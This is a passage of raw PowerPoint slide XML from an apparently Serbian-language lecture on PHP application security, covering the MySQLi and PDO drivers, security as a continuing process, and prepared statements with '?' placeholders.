              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>iz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korišćenja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da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajveri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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što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MySQLi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PDO. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Ova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajvera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dosta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brži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posjeduju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dosta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakteristika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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5253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0E403-F6A1-4E9A-B27B-30964E092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r-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>Sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-ME" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204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F8957-F83B-4938-837A-8139A121D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066800"/>
            <a:ext cx="7194550" cy="5075238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Jednostavnost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lakoća</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>programskog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>jezika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mogućnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>neki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>proces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>odrađen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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>više</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>načina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>vremensko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ograničenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>biti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uzroci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>grešaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pitanju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>svakako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>izdvojiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>vrijeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>budućnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> ne bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>javljale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnost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 ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>gledati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kao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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>karakteristiku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kao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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>proces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>potrebno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dorađivati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ulagati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>njega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Kreiranje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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>obično</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>svodi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to da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>napravi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>prije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proradi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>taj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnost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bezbijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ostaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>drugoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>fazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>izrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>projekta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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kraju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ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dođu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red, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>veoma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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pogrešan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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pristup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Potrebno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>prije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kreiranja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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>utrošiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>vrijeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kreiranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>odgovarajuće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnosti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koncept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kojeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pridržavati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>tokom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>cijelog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razvoja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. 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6108078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681AB-E643-4BE0-8AF2-CCC98A929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Pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Prepared statements)…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557AF-F3C6-4AA5-A2F3-4A7F086DB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752600"/>
            <a:ext cx="7194550" cy="438943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0" dirty="0" err="1"/>
              <a:t>Priprema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izraza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>njegovo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>građenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odvija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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>serveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, pa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stoga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postoji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmjene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikaciji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zbog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>načina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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ni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serveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Prilikom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pisanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>umjesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>promenjivih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>operater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> “?”, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>promjenjive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>šalju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>posebnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcijom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>onim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>redosledom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kakvim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ubacuju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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dirty="0" err="1"/>
              <a:t>Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>opisuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> rad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>MySQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajvera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pripremljenih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
